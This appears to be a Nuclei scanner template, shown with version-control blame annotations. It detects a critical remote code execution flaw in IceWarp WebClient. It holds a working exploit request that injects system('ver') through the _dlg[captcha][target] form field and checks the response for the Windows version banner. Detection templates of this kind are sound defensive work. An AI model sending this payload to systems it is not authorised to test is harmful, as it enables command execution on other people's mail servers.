2021-07-09 04:52:28 +00:00
|
|
|
id: icewarp-webclient-rce
|
|
|
|
|
|
|
|
info:
|
2022-05-30 17:26:21 +00:00
|
|
|
name: IceWarp WebClient - Remote Code Execution
|
2021-07-09 04:52:28 +00:00
|
|
|
author: gy741
|
|
|
|
severity: critical
|
2022-05-31 08:59:38 +00:00
|
|
|
description: |
|
|
|
|
IceWarp WebClient is susceptible to remote code execution.
|
2022-05-30 17:26:21 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-77
|
2021-07-09 04:52:28 +00:00
|
|
|
tags: icewarp,rce
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /webmail/basic/ HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
_dlg[captcha][target]=system(\'ver\')\
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-05-31 08:59:38 +00:00
|
|
|
part: body
|
2021-07-09 04:52:28 +00:00
|
|
|
words:
|
2021-07-10 03:48:32 +00:00
|
|
|
- "Microsoft Windows [Version"
|
2021-07-09 04:52:28 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 302
|
2022-05-30 17:26:21 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/30
|